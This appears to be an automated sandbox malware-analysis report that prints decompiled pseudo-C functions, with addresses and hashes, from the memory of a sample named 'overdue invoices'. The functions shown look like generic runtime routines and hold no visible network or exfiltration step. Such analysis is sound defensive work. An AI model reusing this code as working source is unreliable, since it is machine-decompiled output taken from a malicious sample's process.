						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0xa853e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0xa853e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x97bc46;
						_t48 = E00A17B9C(0xa853e8, 0x97bc46, _t67, 0xa853e8, _t70,  &_v140);
					}
				}
				return L009DB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                  0x009d8ec7
                  0x009d8ed9
                  0x009d8edc
                  0x009d8ee6
                  0x009d8ee9
                  0x009d8eee
                  0x009d8efc
                  0x009d8f08
                  0x00a11349
                  0x00a11353
                  0x00a1135d
                  0x00a11366
                  0x00a1136f
                  0x00a11375
                  0x00a1137c
                  0x00a11385
                  0x00a11390
                  0x00a11391
                  0x00a1139c
                  0x00a1139d
                  0x00a113a6
                  0x00a113ac
                  0x00a113b2
                  0x00a113b5
                  0x00a113bc
                  0x00a113bf
                  0x00a113c2
                  0x00a113c5
                  0x00a113c8
                  0x00a113cb
                  0x00a113ce
                  0x00a113d1
                  0x00a113d4
                  0x00a113d7
                  0x00a113da
                  0x00a113dd
                  0x00a113e0
                  0x00a113e3
                  0x00a113e6
                  0x00a113e9
                  0x00a113f6
                  0x00a11400
                  0x00a11400
                  0x009d8f08
                  0x009d8f32

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0a04229b4bb65772f7a6a0bbea6d9d0f161c7b807861995e26501e354125e59f
                  • Instruction ID: d7fe8f73972764b25701b6fbea7ed84d508028caaa52fb4724e24cdd59188d67
                  • Opcode Fuzzy Hash: 0a04229b4bb65772f7a6a0bbea6d9d0f161c7b807861995e26501e354125e59f
                  • Instruction Fuzzy Hash: 9941A4B1D003189EDB10DFAAD981AADFBF8FB48710F90816EE509A7641DB745A44CF50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D4A2C Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E009D4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xa8d360 ^ _t62;
				_v8 =  *0xa8d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E009B2280(_t26, 0xa88608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L009AFFB0(_t41, _t51, 0xa88608);
						L2:
						 *0xa8b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return L009DB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E009B2280(_t28, 0xa88608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							L009AFFB0(_t42, _t53, 0xa88608);
							if(_t53 != 0) {
								L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						L009AFFB0(_t41, _t51, 0xa88608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                  0x009d4a2c
                  0x009d4a34
                  0x009d4a3c
                  0x009d4a3e
                  0x009d4a48
                  0x009d4a4b
                  0x009d4a4d
                  0x009d4a51
                  0x009d4a9c
                  0x00000000
                  0x00000000
                  0x009d4aa3
                  0x009d4aa8
                  0x009d4aad
                  0x009d4ab1
                  0x009d4ade
                  0x009d4ae3
                  0x009d4a5a
                  0x009d4a62
                  0x009d4a6a
                  0x009d4a6e
                  0x00a0f203
                  0x009d4a84
                  0x009d4a88
                  0x009d4a89
                  0x009d4a8a
                  0x009d4a95
                  0x009d4a95
                  0x009d4a79
                  0x009d4a80
                  0x009d4af2
                  0x009d4af4
                  0x009d4af9
                  0x009d4aff
                  0x009d4b01
                  0x009d4b03
                  0x009d4b08
                  0x00a0f20a
                  0x00a0f212
                  0x00a0f216
                  0x00a0f216
                  0x009d4b08
                  0x009d4b13
                  0x009d4b1a
                  0x00a0f229
                  0x00a0f229
                  0x009d4b1a
                  0x009d4a82
                  0x00000000
                  0x009d4a82
                  0x009d4ab7
                  0x009d4acd
                  0x009d4acd
                  0x009d4ad5
                  0x009d4ada
                  0x00000000
                  0x009d4ada
                  0x009d4ac2
                  0x009d4acb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009d4acb
                  0x009d4a53
                  0x009d4a53
                  0x009d4a58
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8f6273817b0d16a02fa5764c70a98c7b62341600af3bbffb741cc45b0f71d749
                  • Instruction ID: fdb46a261a43a87885023d9d01842c8e403221fe7099758029760bcd53f78cba
                  • Opcode Fuzzy Hash: 8f6273817b0d16a02fa5764c70a98c7b62341600af3bbffb741cc45b0f71d749
                  • Instruction Fuzzy Hash: AE31D1326852509FC731EF54C945B2ABBE8FFC5B10F50892AE8565B791DB78DC00CB86
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009CBC2C Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  C-Code - Quality: 67%
                  			E009CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0xa86100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E009B2280(0xd, 0x349f1a0);
				_t41 =  *0xa860f8; // 0x0
				if(_t41 != 0) {
					 *0xa860f8 =  *_t41;
					 *0xa860fc =  *0xa860fc + 0xffff;
				}
				L009AFFB0(_t41, 0x800, 0x349f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0xa860f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L009B4620(0xa86100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0xa86100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                  0x009cbc36
                  0x009cbc42
                  0x009cbc45
                  0x009cbc4a
                  0x009cbd35
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009cbc50
                  0x009cbc50
                  0x009cbc58
                  0x009cbc5a
                  0x009cbc60
                  0x00000000
                  0x00000000
                  0x00a0a4f2
                  0x00a0a4f6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00a0a4fc
                  0x009cbc79
                  0x009cbc7e
                  0x009cbc86
                  0x009cbd16
                  0x009cbd20
                  0x009cbd20
                  0x009cbc8d
                  0x009cbc94
                  0x009cbcbd
                  0x009cbcca
                  0x009cbccb
                  0x009cbccc
                  0x009cbccd
                  0x009cbcce
                  0x009cbcd4
                  0x009cbcea
                  0x009cbcee
                  0x009cbcf2
                  0x009cbd00
                  0x009cbd04
                  0x00000000
                  0x009cbc96
                  0x009cbcab
                  0x009cbcaf
                  0x009cbd2c
                  0x009cbd2c
                  0x009cbd09
                  0x00000000
                  0x009cbd09
                  0x009cbcb1
                  0x009cbcb5
                  0x009cbcbb
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009cbcbb

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9b130e9e0f58ca8562a8871460157bcd19beb291f4fdd11ccf6ec63d2118a392
                  • Instruction ID: 6faca6927eb109d6f85b48978ed522d97d51b27b70d875b6227d660ed520119b
                  • Opcode Fuzzy Hash: 9b130e9e0f58ca8562a8871460157bcd19beb291f4fdd11ccf6ec63d2118a392
                  • Instruction Fuzzy Hash: 0D310172A006159FDB01DF98D882BA673B4EF18310F104078EC45DB282E774DD06CB82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009C1DB5 Relevance: .1, Instructions: 87COMMON
                  Download Yara Rule
                  C-Code - Quality: 60%
                  			E009C1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E009BF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L009B4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E009BF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                  0x009c1dc2
                  0x009c1dc5
                  0x009c1dc7
                  0x009c1dcc
                  0x009c1dce
                  0x009c1dd6
                  0x009c1ddf
                  0x009c1de0
                  0x009c1de1
                  0x009c1de5
                  0x009c1de8
                  0x009c1def
                  0x009c1df0
                  0x009c1df6
                  0x009c1df7
                  0x009c1dfe
                  0x009c1e1a
                  0x00000000
                  0x00000000
                  0x009c1e0b
                  0x009c1e12
                  0x009c1e12
                  0x009c1e00
                  0x009c1e00
                  0x009c1e05
                  0x009c1e1e
                  0x009c1e23
                  0x00a0570f
                  0x00a05713
                  0x00000000
                  0x00000000
                  0x00a05719
                  0x00a05719
                  0x009c1e2c
                  0x009c1e2d
                  0x009c1e2e
                  0x009c1e2f
                  0x009c1e31
                  0x009c1e32
                  0x009c1e35
                  0x009c1e3d
                  0x00a05723
                  0x00a0573d
                  0x00a0573d
                  0x00000000
                  0x00a05723
                  0x009c1e49
                  0x009c1e4e
                  0x009c1e4e
                  0x009c1e09
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                  • Instruction ID: 3d2e8fad058518c843b82c087e0c5af9d86684f25a23059104600b7d73acd3df
                  • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                  • Instruction Fuzzy Hash: 38218D32A00518EBC720CF99CD80FABBBBDEF86750F514459E901D7222D634AE01DBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00999100 Relevance: .1, Instructions: 87COMMON
                  Download Yara Rule
                  C-Code - Quality: 76%
                  			E00999100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0xa6f6e8);
				E009ED0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E00A688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E009ED130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0xa886c0; // 0x5307b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0xa886b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E009B2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E00A688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							L009DAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0xa8b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0xa884c0;
										if(_t69 >=  *0xa884c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E00A69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0099922A(_t82);
							_t53 = E009B7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E00A68B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0xa886c0; // 0x5307b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0xa886b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0xa886bc;
										_t72 = 0xa886b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00999240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0xa886c4;
									_t72 = 0xa886c0;
									L18:
									E009C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                  0x00999100
                  0x00999100
                  0x00999100
                  0x00999100
                  0x00999102
                  0x00999107
                  0x0099910c
                  0x00999110
                  0x00999115
                  0x00999136
                  0x00999143
                  0x009f37e4
                  0x009f37e4
                  0x00999149
                  0x0099914e
                  0x0099914e
                  0x00999117
                  0x0099911d
                  0x00000000
                  0x00000000
                  0x0099911f
                  0x00999125
                  0x00000000
                  0x00999151
                  0x00999158
                  0x0099915d
                  0x00999161
                  0x00999168
                  0x009f3715
                  0x00000000
                  0x0099916e
                  0x0099916e
                  0x00999175
                  0x00999177
                  0x0099917e
                  0x0099917f
                  0x00999182
                  0x00999182
                  0x00999187
                  0x00999187
                  0x0099918a
                  0x0099918d
                  0x0099918f
                  0x00999192
                  0x00999195
                  0x00999198
                  0x00999198
                  0x00999198
                  0x0099919a
                  0x00000000
                  0x00000000
                  0x009f371f
                  0x009f3721
                  0x009f3727
                  0x009f372f
                  0x009f3733
                  0x009f3735
                  0x009f3738
                  0x009f373b
                  0x009f373d
                  0x009f3740
                  0x00000000
                  0x00000000
                  0x009f3746
                  0x009f3749
                  0x00000000
                  0x00000000
                  0x009f374f
                  0x009f3751
                  0x00000000
                  0x00000000
                  0x009f3757
                  0x009f3759
                  0x009f375c
                  0x009f375c
                  0x009f375e
                  0x009f375e
                  0x009f3761
                  0x009f3764
                  0x00000000
                  0x00000000
                  0x009f3766
                  0x009f3768
                  0x009f37a3
                  0x009f37a3
                  0x009f37a5
                  0x009f37a7
                  0x009f37ad
                  0x009f37b0
                  0x009f37b2
                  0x009f37bc
                  0x009f37c2
                  0x009f37c2
                  0x009f37b2
                  0x00999187
                  0x00999187
                  0x0099918a
                  0x0099918d
                  0x0099918f
                  0x00999192
                  0x00999195
                  0x00000000
                  0x00999195
                  0x00000000
                  0x00999187
                  0x009f376a
                  0x009f376a
                  0x009f376c
                  0x009f376c
                  0x009f376f
                  0x009f3775
                  0x00000000
                  0x00000000
                  0x009f3777
                  0x009f3779
                  0x00000000
                  0x00000000
                  0x009f3782
                  0x009f3787
                  0x009f3789
                  0x009f3790
                  0x009f3790
                  0x009f378b
                  0x009f378b
                  0x009f378b
                  0x009f3792
                  0x009f3795
                  0x009f3795
                  0x009f3798
                  0x009f3798
                  0x009f379b
                  0x009f379b
                  0x009991a3
                  0x009991a9
                  0x009991b0
                  0x009991b4
                  0x009991b4
                  0x009991bb
                  0x009991c0
                  0x009991c5
                  0x009991c7
                  0x009f37da
                  0x009991cd
                  0x009991cd
                  0x009991cd
                  0x009991d2
                  0x009991d5
                  0x00999239
                  0x00999239
                  0x009991d7
                  0x009991db
                  0x009991e1
                  0x009991e7
                  0x009991fd
                  0x00999203
                  0x0099921e
                  0x00999223
                  0x00000000
                  0x00999223
                  0x00999205
                  0x00999208
                  0x0099920c
                  0x00999214
                  0x00999214
                  0x009991e9
                  0x009991e9
                  0x009991ee
                  0x009991f3
                  0x009991f3
                  0x009991f3
                  0x009991e7
                  0x00000000
                  0x009991db
                  0x00999187
                  0x00999168

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51b58b04929590b856eb31790ab9c4e46097ea29c79f68005ad03195ccb4bc1a
                  • Instruction ID: 313c204b03357fecb34ae5b1eca250a75c2a3c828a4f81668b9f3174939a75b6
                  • Opcode Fuzzy Hash: 51b58b04929590b856eb31790ab9c4e46097ea29c79f68005ad03195ccb4bc1a
                  • Instruction Fuzzy Hash: D131F271A09286DFDF35DF6CC488BACBBB9BB89350F28815DD40467251D738AD80CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009B0050 Relevance: .1, Instructions: 81COMMON
                  Download Yara Rule
                  C-Code - Quality: 53%
                  			E009B0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xa8d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E009C9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L009DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E00A68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L009C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0xa8b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                  0x009b0055
                  0x009b005d
                  0x009b0062
                  0x009b006c
                  0x009b006f
                  0x009b0074
                  0x009b007a
                  0x009b007a
                  0x009b0080
                  0x009b0080
                  0x009b0087
                  0x009b008d
                  0x009b008f
                  0x009b0093
                  0x009b0095
                  0x009b009b
                  0x009b00f8
                  0x009b00fb
                  0x009b00fc
                  0x009b00ff
                  0x009b0108
                  0x009b0108
                  0x009b00a2
                  0x009b00a6
                  0x009b00b3
                  0x009b00bc
                  0x009b00c5
                  0x009b00ca
                  0x009fc01e
                  0x00000000
                  0x00000000
                  0x009fc02d
                  0x009b00d5
                  0x009b00d9
                  0x009fc03d
                  0x009fc046
                  0x009fc046
                  0x009b00df
                  0x009b00e2
                  0x009b00ea
                  0x009b00ef
                  0x009b00f2
                  0x009b00f6
                  0x009b0111
                  0x009b0117
                  0x009b0117
                  0x00000000
                  0x009b00f6
                  0x009b00d0
                  0x009b00d0
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad910da867ea22bbb1d3edefcc1b52e95aaf0808711abc99ec6b8aab3798706c
                  • Instruction ID: 70c48b3d249f5bc48af93c3a896f4ed3deeee661bb7141601d96f257292a1d92
                  • Opcode Fuzzy Hash: ad910da867ea22bbb1d3edefcc1b52e95aaf0808711abc99ec6b8aab3798706c
                  • Instruction Fuzzy Hash: 45318E31601B04CFD725DF28C945B97B3E5FF88724F14866DE59687690EB35AC01CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00A16C0A Relevance: .1, Instructions: 79COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E00A16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E009B7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0xa87b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L009B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E009DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E009B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
